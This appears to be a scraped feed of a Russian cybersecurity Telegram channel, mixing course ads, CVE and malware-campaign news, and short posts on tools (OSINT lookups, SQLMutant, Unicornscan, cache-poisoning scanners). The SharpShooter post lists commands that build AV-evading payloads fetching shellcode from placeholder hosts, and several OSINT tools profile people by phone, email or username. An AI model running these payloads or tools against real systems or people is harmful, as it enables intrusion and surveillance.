34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Коллеги, уже сегодня встречаемся на Практикуме по Web Application Penetration Testing (WAPT) 🔥
Мы будем разбирать реальный кейс по веб-пентесту. Не в теории, а в реальной работе, когда автоматические сканеры уже не помогают.
🟧 Регистрация: https://wapt-workshop.codeby.school
Что вас ждёт:
🟧 Реальная работа с уязвимостями.
🟧 Презентация курса Академии Codeby.
🟧 Нестандартные XSS и SQL-инъекции, которые не ловят сканеры.
🟧 Разбор уязвимостей и применение эксплойтов.
🟧 Демонстрация методики мышления настоящего пентестера.
Почему важно быть онлайн:
— можно задать вопросы по ходу разбора
— будут детали, которые не попадут в запись
— живой диалог по кейсу, а не монолог.
Практикум пройдёт в прямом эфире.
Количество мест ограничено.
🟧 СЕГОДНЯ, 19:00 МСК
🟧 Регистрируйтесь и получите ссылку на эфир: https://wapt-workshop.codeby.school
Если будут вопросы по регистрации — пишите в бот @CodebyAcademyBot
MASTER OSINT
Master OSINT — это комплексный, удобный для начинающих набор инструментов на Python, предназначенный для проведения расследований на основе открытых источников информации. Инструмент поддерживает множество методов расследования.
📕Характиристика:
➖Извлечение GPS-координат из EXIF-данных изображений.
➖Исследование присутствия в социальных сетях на более чем 30 платформах по имени пользователя.
➖Выявление утечек электронной почты и анализ общедоступных фрагментов текста.
➖Проверка подлинности электронной почты с помощью Hunter.io, ReverseContact.com и Epieos.
➖Извлечение метаданных из изображений/документов.
➖Использование расширенных операторов поиска Google (Google Dorking).
➖Доступ к архивным снимкам веб-сайтов через Wayback Machine.
➖Определение IP-адреса и получение отчетов о нарушениях с помощью AbuseIPDB.
➖Парсинг метаданных веб-сайтов и извлечение именованных сущностей с помощью spaCy NLP.
➖Проверка и исследование телефонных номеров с информацией о операторе связи и типе телефона.
➖Выполнение обратного поиска изображений с использованием популярных поисковых систем.
➖Доступ к мощной геопространственной аналитике с помощью Google Satellite и OpenStreetMap.
💻Установка:
git clone https://gist.github.com/5fb49b007d48cf2717bc3c12958e47b5.git
mv 5fb49b007d48cf2717bc3c12958e47b5/ osintmaster/
cd osintmaster/
pip install waybackpy --break-system-packages
python3 Master_osint.py
Коллеги, в понедельник встречаемся на Практикуме по Web Application Penetration Testing (WAPT) 🔥
Для тех, кто ещё не в списке участников — это хороший повод задуматься.
Мы будем разбирать реальный кейс по веб-пентесту. Не в теории, а в реальной работе, когда автоматические сканеры уже не помогают.
К эфиру подготовлен живой практический разбор.
🟧 Регистрация: https://wapt-workshop.codeby.school
Что вас ждёт:
🟧 Реальная работа с уязвимостями.
🟧 Презентация курса Академии Codeby.
🟧 Нестандартные XSS и SQL-инъекции, которые не ловят сканеры.
🟧 Разбор уязвимостей и применение эксплойтов.
🟧 Демонстрация методики мышления настоящего пентестера.
Это не лекция. Это сложный разбор с моментами, где даже у опытного специалиста возникают вопросы.
Почему важно быть онлайн:
— можно задать вопросы по ходу разбора
— будут детали, которые не попадут в запись
— живой диалог по кейсу, а не монолог.
Практикум пройдёт в прямом эфире.
Количество мест ограничено.
🟧 26 января, 19:00 МСК
🟧 Регистрация: https://wapt-workshop.codeby.school
Если будут вопросы по регистрации — пишите в бот @CodebyAcademyBot
🔎 AI позволяет красть данные!
🪧 Уязвимости в фреймворке Chainlit AI позволяют осуществлять кражу данных посредством чтения файлов и уязвимости SSRF.
🔁 В популярной платформе искусственного интеллекта с открытым исходным кодом Chainlit были обнаружены уязвимости безопасности , которые могут позволить злоумышленникам красть конфиденциальные данные, что, в свою очередь, может обеспечить горизонтальное перемещение внутри уязвимой организации.
🎇 Компания Zafran Security заявила, что эти серьезные уязвимости, получившие общее название ChainLeak , могут быть использованы для утечки ключей API облачных сред и кражи конфиденциальных файлов, а также для проведения атак с подделкой запросов на стороне сервера (SSRF) против серверов, на которых размещены приложения искусственного интеллекта.
⏺️ Подробности об этих двух уязвимостях следующие:
➡️ CVE-2026-22218 (CVSS: 7.1) — уязвимость произвольного чтения файлов в процессе обновления "/project/element", позволяющая авторизованному злоумышленнику получить доступ к содержимому любого файла, доступного для чтения службой, в свою собственную сессию из-за отсутствия проверки полей контроллера пользователя.
➡️ CVE-2026-22219 (CVSS: 8.3) — уязвимость SSRF в потоке обновления "/project/element" при настройке с использованием бэкэнда уровня данных SQLAlchemy, которая позволяет злоумышленнику выполнять произвольные HTTP-запросы к внутренним сетевым службам или конечным точкам облачных метаданных с сервера Chainlit и сохранять полученные ответы.
❗️ Будьте внимательны!
#ai #ssrf #cve #chainleak
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
❗️ Уязвимость в Python библиотеке для ИИ
🪧 В библиотеках Python с открытым исходным кодом для искусственного интеллекта, выпущенных Apple (FlexTok), NVIDIA (NeMo) и Salesforce (Uni2TS), обнаружены уязвимости, позволяющие удаленное выполнение кода (RCE) при загрузке файла модели со вредоносными данными.
🧾 «Уязвимости возникают из-за того, что библиотеки используют метаданные для настройки сложных моделей и конвейеров, где используемая сторонняя библиотека создает экземпляры классов, используя эти метаданные. Уязвимые версии этих библиотек просто выполняют предоставленные данные как код. Это позволяет злоумышленнику внедрить произвольный код в метаданные модели, который будет автоматически выполняться при загрузке этих модифицированных моделей уязвимыми библиотеками», — заявило подразделение 42 Palo Alto Networks
💻 Речь идет о сторонней библиотеке Hydra от Meta, а именно о функции «hydra.utils.instantiate()», которая позволяет запускать код с использованием функций Python, таких как os.system(), builtins.eval() и builtins.exec().
🔎 Уязвимости, отслеживаемые как CVE-2025-23304 (NVIDIA) и CVE-2026-22584 (Salesforce), были устранены соответствующими компаниями
❓ А вы используете эти библиотеки в работе?
#python #ai #cve #hydra
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Ваша ИТ-безопасность — это вы. И сегодня это самое уязвимое место.
Атаки стали точечными. Цель — не ваш компьютер, а конкретно вы: ваши данные для шантажа, доступ для мошенничества, ресурсы для скрытого майнинга.
В статье — разбор реальных векторов атаки и как их предотвратить:
⏺️Фишинг, который невозможно отличить от письма коллеги.
⏺️Уязвимости в привычном ПО, которые вы забыли обновить.
⏺️Социнженерия, где ваша вежливость становится оружием против вас.
👉Мы подготовили чек-лист по настройке базовой защиты, рекомендации по выбору EDR-решений для дома и стратегию резервного копирования, которая переживет любую ransomware-атаку.
Узнайте ➡️ в статье, как обезопасить свой компьютер и данные раз и навсегда.
#Ransomware #РезервноеКопирование #ЗащитаДанных #CodebyNet
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Сборная России поедет в Австралию защищать чемпионский титул по кибербезопасности
Российские старшеклассники примут участие в Международной олимпиаде по кибербезопасности, которая пройдет с 27 июня по 2 июля в Сиднее. Подготовкой команды, как и в прошлом году, займутся эксперты Центрального университета и «Лаборатории Касперского».
Напомним, что в 2025 году их усилия принесли блестящий результат: на первой такой олимпиаде в Сингапуре российская сборная завоевала абсолютный комплект наград — 8 медалей из 8 возможных.
Сейчас идет формирование новой команды. К отбору приглашают школьников от 14 лет, увлеченных информационной безопасностью. Регистрация продлится до 7 февраля, после чего кандидатов ждут онлайн-испытания и очные туры.
У сборной России будет шанс повторить прошлогодний триумф на мировой арене.
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
GEOLOCATOR_ULTIMATE
Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.
📕Характиристика:
1️⃣Автономная база данных (MaxMind GeoLite2)
2️⃣Расширенный анализ консенсуса
3️⃣Выявление угроз и репутации
4️⃣Генерация отчетов в формате JSON
5️⃣Интуитивно понятный интерфейс терминала
💻Установка:
git clone https://github.com/hackermexico/geolocator_ultimate.git
cd geolocator_ultimate/
python3 geoultimate.py <TAGRGET>
python3 geoultimate.py <TAGRGET> --save
🚩 Новые задания на платформе HackerLab!
🕵️ Категория Форензика — Следопыт
🎢 Категория Разное — APT
Приятного хакинга!
Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.
Какие библиотеки используете вы? Пишите в комментариях ⬇️
Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.
#python #автоматизация #libs
➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером
🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.
⚙️ Основные возможности rnsec
➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.
⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.
npm install -g rnsec
cd /path/to/your-react-native-app
rnsec scan
rnsec scan
rnsec scan --path /Users/dev/my-react-native-app
rnsec scan --html security-report.html --output security.json
PH0MBER
PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.
📕Характеристика:
1️⃣Поиск по номеру телефона
2️⃣Поиск по IP-адресу
3️⃣Поиск по MAC-адресу
4️⃣Поиск информации через whois
5️⃣Поиск по имени пользователя
📌Установка:
git clone https://github.com/s41r4j/phomber.git
cd phomber
pip3 install mac-vendor-lookup
python3 phomber.py
phone <NUMBER>
whois <DOMAIN>
🔔 Хотите понять, как проходит WAPT — тестирование на проникновение? Сегодня разберем это подробнее!
Освойте WAPT на практике — старт курса по тестированию веб-приложений на проникновение 22 января!
#WAPT #XSS #OWASP
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
📱 В январе 2026 года в медиапространстве появилась новость: произошла утечка данных 17,5 миллионов аккаунтов Instagram*. Однако официальные заявления Meta* и технические детали от экспертов по кибербезопасности раскрывают более сложную картину.
💫Что стало известно из расследования?
Согласно отчету компании по кибербезопасности Malwarebytes, история началась 7 января 2026 года, когда на хакерском форуме BreachForums были опубликованы крупные структурированные файлы (JSON и TXT) с данными. Их происхождение связывают с хакером под псевдонимом «Solonik».
Какие данные были обнародованы:
- Имена пользователей (логины) и полные имена
- Адреса электронной почты
- Международные номера телефонов
- Частичные физические адреса
- Внутренние идентификаторы пользователей (User IDs)
Важно: в утечке не фигурировали пароли пользователей. Эксперты Malwarebytes предполагают, что источником утечки мог быть инцидент, связанный с API Instagram*, который произошел еще в 2024 году.
«Мы устранили проблему, которая позволяла внешней стороне запрашивать письма для сброса пароля для некоторых людей. Не было взлома наших систем, и ваши аккаунты в Instagram защищены. Вы можете игнорировать эти письма — приносим извинения за возможную путаницу».
🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY — ИТОГИ 🎄
Друзья, спасибо всем, кто принял участие в нашей новогодней лотерее!
Мы рады объявить 10 победителей:
🥇 1 место — iPhone 17
Номер участника: 102
🥈 2 место — Apple Watch
Номер участника: 314
🥉 3 место — AirPods
Номер участника: 307
🎁 4–10 места — подписка HackerLab PRO на 1 месяц
Номера участников:
105
313
300
101
312
303
206
Поздравляем всех победителей! ❤️
Спасибо, что учитесь и развиваетесь вместе с нами!
Что делать победителям?
Пожалуйста, напишите нам в личные сообщения @CodebyAcademyBot в течение 48 часов для получения приза согласно регламенту.
📌 Видео с розыгрышем в посте
Напоминаем: в Академии Кодебай в 2026 продолжается обучение по ключевым направлениям кибербезопасности, а также доступны подарочные сертификаты на курсы — отличный старт в Новом году.
Спасибо, что вы с нами.
До встречи на обучении и в следующих розыгрышах! 😎
#кодебай #розыгрыш #итоги #онлайнобучение #курсыиб #cybersecurity
🚗 На HackerLab появилась новая категория задач — Pro-лаборатории
Что это такое?
Pro-лаба — это сеть машин с уязвимостями.
Задача — найти слабые места, разобраться, как всё устроено, использовать уязвимости и шаг за шагом углубляться в сеть, собирая флаги на каждом этапе.
Чем отличается от обычных задач?
Это не “одна машина — один флаг — конец”. Тут нетривиальные сценарии, цепочки, побочные ветки и моменты, где надо:
➡️ ориентироваться в сети, а не в одном хосте
➡️ разбирать нестандартные протоколы
➡️ находить подсказки в самых неожиданных местах
➡️ комбинировать техники, потому что одной не хватит
Часть флагов — обязательные для продвижения цепочки, а часть — побочные: они открывают дополнительные возможности и дают то самое чувство «а, вот оно как устроено».
И это доступно по подписке Pro вместе с сотнями CTF-задач и курсами:
⏺️Введение в информационную безопасность
⏺️SQL Injection Master
Залетай и проверь, насколько хорошо ты умеешь двигаться по сети
🔗 https://hackerlab.pro/
❗️ Россию накрывает новая волна фишинговой кампании!
🇷🇺 Многоэтапная фишинговая кампания нацелена на Россию с использованием RAT-программы Amnesia и Ransomware.
✉️ «Атака начинается с методов социальной инженерии, используемых в качестве приманки с помощью документов деловой тематики, которые выглядят обычными и безобидными», — заявила исследовательница Кара Лин. «Эти документы и сопровождающие их скрипты служат визуальными отвлекающими маневрами, перенаправляя жертв на фальшивые задачи или сообщения о состоянии, в то время как вредоносная деятельность незаметно происходит в фоновом режиме».
🔔 В рамках этой кампании используются методы социальной инженерии для распространения сжатых архивов, содержащих множество поддельных документов и вредоносный ярлык Windows (LNK) с русскоязычными именами файлов. Файл LNK использует двойное расширение. Один из примеров: "Задание_для_бухгалтера_02отдела.txt.lnk".
🔔 При выполнении скрипт запускает команду PowerShell для получения следующего этапа — сценария PowerShell, размещенного в репозитории GitHub ("github[.]com/Mafin111/MafinREP111"), который затем служит загрузчиком первого этапа для закрепления системы, подготовки системы к сокрытию следов вредоносной активности и передачи управления последующим этапам.
🔔 После того как документ отображается жертве для поддержания обмана, скрипт отправляет сообщение злоумышленнику через API Telegram-бота , информируя оператора об успешном выполнении первого этапа. После преднамеренно введенной задержки в 444 секунды скрипт PowerShell запускает скрипт Visual Basic ("SCRRC4ryuk.vbe"), размещенный в том же репозитории.
🪧 Скрипт Visual Basic сильно обфусцирован и выступает в роли контроллера, который собирает полезную нагрузку следующего этапа непосредственно в памяти, тем самым избегая оставления каких-либо следов на диске. Скрипт на заключительном этапе проверяет, выполняется ли он с повышенными привилегиями, и, если нет, многократно отображает запрос контроля учетных записей пользователей ( UAC ), чтобы заставить жертву предоставить ему необходимые разрешения. Скрипт делает паузу в 3000 миллисекунд между попытками.
🧾 Одна из последних полезных нагрузок, развертываемых после успешного отключения средств защиты и механизмов восстановления, — это Amnesia RAT ("svchost.scr"), которая загружается из Dropbox и способна к масштабной краже данных и удаленному управлению. Она предназначена для кражи информации, хранящейся в веб-браузерах, криптовалютных кошельках, Discord, Steam и Telegram, а также системных метаданных, скриншотов, изображений с веб-камеры, звука с микрофона, содержимого буфера обмена и заголовка активного окна.
☁️ Для противодействия злоупотреблениям со стороны defendnot в отношении API Центра безопасности Windows, Microsoft рекомендует пользователям включить защиту от несанкционированного доступа, чтобы предотвратить несанкционированные изменения настроек Defender, а также отслеживать подозрительные вызовы API или изменения в работе служб Defender.
❗️ Будьте внимательны и предупредите своих коллег! ❗️
#russia #phishing #rat #microsoft
Источник: https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
SQLMutant
SQLMutant — это инструмент для тестирования SQL-инъекций, включающий как пассивные, так и активные процессы разведки для любого заданного домена. Он фильтрует URL-адреса, чтобы выявить те, параметры которых подвержены SQL-инъекциям, а затем выполняет атаки с использованием инъекций. Эти атаки включают сопоставление шаблонов, анализ ошибок и атаки по времени.
📕Характиристика:
1️⃣URL Fuzzer - Эта функция позволяет пользователю указать целевой URL-адрес, а затем выполнить фаззинговую атаку для обнаружения любых уязвимых параметров, которые могут быть использованы для SQL-инъекций.
2️⃣SQL Payloads - SQLMutant предоставляет набор предопределенных полезных нагрузок для SQL-инъекций, которые можно использовать для проверки наличия уязвимостей.
3️⃣Header Fuzzer - Эта функция позволяет пользователю фаззингировать HTTP-заголовки для проверки на наличие уязвимостей SQL-инъекций.
4️⃣Waybackurls Integration - В SQLMutant интегрирован инструмент Waybackurls, используемый для поиска исторических версий веб-страницы. Эта функция позволяет находить страницы, которые больше недоступны, но могут содержать уязвимости, существовавшие в прошлом.
5️⃣Arjun Integration - SQLMutant также интегрирует инструмент Arjun, который используется для поиска скрытых параметров и каталогов на веб-сервере.
💻Установка:
pip3 install uro --break-system-packages
sudo apt install golang-go
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
go install github.com/tomnomnom/waybackurls@latest
sudo apt-get install arjun
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
sudo apt-get install jq toilet lolcat
git clone https://github.com/blackhatethicalhacking/SQLMutant.git
cd SQLMutant/
chmod +x SQLMutant.sh
./SQLMutant.sh
Go-Hash
Инструмент идентификации алгоритмов для хешей, таких как MD5, SHA1, SHA256, SHA512, MYSQL.
📕Характеристика:
1️⃣Очень простой интерфейс.
2️⃣Поддержка основных алгоритмов (MD5, SHA1, SHA256, SHA512, MYSQL)
💻Установка:
git clone https://github.com/HunxByts/Go-Hash.git
cd Go-Hash
pip3 install -r requirements.txt --break-system-packages
python3 gohash.py
⚡️ ZDNS — высокоскоростной DNS-резолвер и утилита командной строки для выполнения крупномасштабных измерений DNS. Написан на языке Go и содержит собственный код рекурсивного разрешения и кэш, оптимизированный для поиска разнообразных наборов имен.
💻 Установка
git clone https://github.com/zmap/zdns.git
cd zdns
make install
A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.
A поиска для IP-адресов, если получен NS в NSLOOKUP).bind.version).echo "censys.io" | zdns A{
"name": "censys.io",
"results": {
"A": {
"data": {
"additionals": [
{
"flags": "",
"type": "EDNS0",
"udpsize": 512,
"version": 0
}
],
"answers": [
{
"answer": "104.18.10.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
},
{
"answer": "104.18.11.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
}
],
"protocol": "udp",
"resolver": "[2603:6013:9d00:3302::1]:53"
},
"duration": 0.285295416,
"status": "NOERROR",
"timestamp": "2024-08-23T13:12:43-04:00"
}
}
}
MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.alookup работает аналогично nslookup и отслеживает записи CNAME. mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена. nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.echo "censys.io" | zdns mxlookup --ipv4-lookup
{
"name": "censys.io",
"results": {
"MXLOOKUP": {
"data": {
"exchanges": [
{
"class": "IN",
"ipv4_addresses": [
"209.85.202.27"
],
"name": "alt1.aspmx.l.google.com",
"preference": 5,
"ttl": 300,
"type": "MX"
},
{
"class": "IN",
"ipv4_addresses": [
"142.250.31.26"
],
"name": "aspmx.l.google.com",
"preference": 1,
"ttl": 300,
"type": "MX"
}
]
},
"duration": 0.154786958,
"status": "NOERROR",
"timestamp": "2024-08-23T13:10:11-04:00"
}
}
}
Освойте UserGate и повысьте уровень защиты своей ИТ-инфраструктуры!
Бесплатный онлайн-курс поможет вам шаг за шагом освоить внедрение и настройку UserGate — без лишней теории, с упором на практику.
В программе курса:
✅ Настройка сетевых зон, NAT, VPN, кластеров, фильтрации на уровне приложений и правил межсетевого экрана
✅ Интеграция с LDAP и Active Directory, фильтрация контента, системы обнаружения вторжений и обратный прокси
✅ Пошаговые видеоуроки, практические упражнения и итоговое тестирование
По завершении курса Вы получите:
⭐ именной сертификат
📕 PDF-инструкции
📋 чек-листы и готовые конфигурации, которые помогут в дальнейшей работе
Пройдите курс в удобное время — запись уже доступна.
Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250
❗️РКН будет фильтровать трафик с помощью ИИ
Роскомнадзор (РКН) планирует создать и внедрить механизм фильтрации интернет-трафика с использованием инструментов машинного обучения в этом году. На эти цели выделят 2,27 млрд рублей, следует из плана цифровизации РКН, который направлен правкомиссии по цифровому развитию. По мнению экспертов, с помощью таких инструментов РКН может научиться эффективнее блокировать запрещенные ресурсы, а также ограничивать работу VPN-сервисов.
С помощью ТСПУ уже заблокировано более 1 млн запрещенных в России ресурсов. За день ТСПУ ограничивает доступ в среднем к 5500 новых сетевых адресов и доменов, рассказывал в интервью «Известям» замглавы РКН Олег Терляков в июне 2025 года.
Инструменты машинного обучения на ТСПУ могут использоваться для разработки и автоматического применения правил фильтрации трафика, не исключает эксперт организации RKS-Global, пожелавший остаться анонимным: например, чтобы находить и блокировать трафик VPN-сервисов. Кроме того, полагает он, такие инструменты позволяют осуществлять поиск по текстам на разных языках и по изображениям и видео: «Так, Китай уже вовсю использует ИИ в мониторинге интернета».
Впрочем, не для всех систем РКН применение ИИ оказалось одинаково действенным. Так, в системе мониторинга использования персональных данных в интернете служба тестировала нейросети, но, по признанию замруководителя РКН Милоша Вагнера, их эффективность оказалась не так высока: «В тестовом режиме посмотрели на работу нейросетей, оценили их результативность в 60%. <…> Чтобы ожидаемая точность анализа повысилась <…>, нужно было составить обучающие датасеты по объемам, превосходящим мониторинг всех сайтов, который Роскомнадзор проводил за несколько лет. Такие трудозатраты в условиях необходимости экономии средств мы сочли на этом этапе преждевременными».
Источник: https://www.forbes.ru/tekhnologii/553640-algoritmiceskie-upraznenia-rkn-budet-fil-trovat-trafik-s-pomos-u-masinnogo-obucenia
#news #ркн #vpn #ии
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
💫 Перед вами — четыре снимка с мест событий, собранные в одно дело. Сможете вычислить угрозу?
1. Какой термин скрывается за этими кадрами?
2. Какой его главный и самый опасный принцип?
Включайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻
🦈 SharpShooter
Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.
Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.
Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.
Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.
⚡️ Установка
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки
Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.
sudo apt install unicornscan
unicornscan -h
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50
Защита от прослушки: практический взгляд без мифов
Средства негласного получения информации давно вышли за пределы спецслужб.
Диктофоны, радиопередатчики, BLE-трекеры и модифицированные устройства свободно доступны и регулярно используются в мошенничестве, корпоративных конфликтах и бытовых инцидентах.
Понимание принципов их работы — базовый навык для специалистов по безопасности, OSINT и технической разведке.
Мы подготовили PDF-гайд
«Инструкция: защита от популярных методов прослушки» — авторский материал от эксперта OSINT.
В гайде разобрано:
🟧 классификация устройств скрытого наблюдения: записывающие и транслирующие
🟧 диктофоны, радиожучки, GSM/LTE-трекеры, BLE/UWB-метки и нестандартные решения
🟧 ключевые демаскирующие признаки: питание, радиоканалы, конструктив
🟧 методы обнаружения: визуальный контроль, радиомониторинг, анализ спектра
🟧 практические способы противодействия в быту, офисе и автомобиле
Материал ориентирован на реальные сценарии, без художественных допущений и маркетинговых преувеличений.
➡️Скачать гайд бесплатно
https://wipro-guide.codeby.school/
Гайд будет полезен:
✅ специалистам ИБ и OSINT
✅ техническим и управленческим сотрудникам
✅ тем, кто работает с чувствительной информацией
В конце гайда — рекомендации по дальнейшему профессиональному развитию в области разведки и анализа данных.
➡️Перейти к гайду
https://wipro-guide.codeby.school/
🎓Web Cache Vulnerability Scanner (WCVS)
Быстрый и универсальный CLI-сканер для обнаружения уязвимостей отравления веб-кэша (web cache poisoning) и обмана веб-кэша (web cache deception).
Сканер поддерживает множество различных техник отравления и обмана веб-кэша, включает встроенный краулер для обнаружения дополнительных URL-адресов для тестирования, а также способен адаптироваться к конкретному веб-кэшу для более эффективного сканирования. Инструмент обладает широкими возможностями настройки и легко интегрируется в существующие CI/CD-пайплайны.
Установка
1️⃣Готовые двоичные файлы WCVS доступны на странице релизов.
2️⃣ Kali Linux: apt install web-cache-vulnerability-scanner.
3️⃣ Установка с помощью Go: go install -v github.com/Hackmanit/Web-Cache-Vulnerability-Scanner@latest.
⌨️Использование
Инструмент обладает широкими возможностями настройки с помощью флагов. Многие флаги могут содержать непосредственно значение или путь к файлу.
😳 Единственный обязательный флаг -u/--url — указывает на целевой URL-адрес, который необходимо проверить на предмет отравления/обмана веб-кэша. Целевой URL-адрес может быть указан в разных форматах.
Для проверки половины методов WCVS нужны два списка слов: один со словами из заголовков, а другой — со словами из параметров. Списки слов могут находиться в том же каталоге, из которого запускается WCVS, или быть указаны с помощью флагов --headerwordlist/-hw и --parameterwordlist/-pw.
wcvs -u https://example.com
wcvs -u https://example.com -hw "file:/home/user/Documents/wordlist-header.txt" -pw "file:/home/user/Documents/wordlist-parameter.txt"
wcvs -u https://example.com -r 5 -red /home/user/Documents/mydomains.txt
wcvs -u https://example.com -r 5 -rl 2
📱 Mobile Verification Toolkit (MVT) 📲📲
Набор утилит для упрощения и автоматизации процесса сбора данных для криминалистической экспертизы, которые помогают выявить потенциальную компрометацию устройств на базе Android и iOS.
python3 -m venv env
source env/bin/activate
pip install mvt
#OR
pipx install --force git+https://github.com/mvt-project/mvt.git
mvt-ios и mvt-android.mvt-ios decrypt-backup [OPTIONS] BACKUP_PATH
mvt-ios check-backup --output /path/to/output/ /path/to/backup/udid/
mvt-android download-apks --output /path/to/folder
MVT_VT_API_KEY=<key> mvt-android download-apks --output /path/to/folder --virustotal
mvt-android check-adb --output /path/to/results
H4X-Tools
H4X-Tools - Набор инструментов с открытым исходным кодом для сбора данных, OSINT и многого другого.
📕Характеристика:
Веб-поиск: Выполняет поиск в Интернете по заданному запросу.
Поиск номера телефона: Ищет номер телефона и возвращает информацию о нем.
Сканер Портов: Сканирует открытые порты по заданному IP-адресу/домену.
Поиск по нику: Пытается найти заданное имя пользователя на многих разных веб-сайтах.
Поиск по почте: Эффективно находит зарегистрированные аккаунты по заданному адресу электронной почты.
💻Установка:
git clone https://github.com/vil/H4X-Tools.git
cd H4X-Tools
pip3 install -r requirements.txt --break-system-packages
python3 h4xtools.py
#osint #cybersecurity
📣ПОСЛЕДНИЙ ШАНС! ИТОГИ НОВОГОДНЕЙ ЛОТЕРЕИ CODEBY УЖЕ СЕГОДНЯ!🎁
Сегодня в 21:00 (МСК) определим 10 победителей в прямом эфире!
У вас еще есть время, чтобы войти в число участников на: iPhone 17, Apple Watch, AirPods и подписки HackerLab PRO.
Для этого нужно приобрести любой курс стартующий в 2026 году. Каждая покупка — ваш лотерейный билет.
⌛Розыгрыш: СЕГОДНЯ, 12 января, 21:00 МСК.
✅ Выбрать курс и успеть участвовать
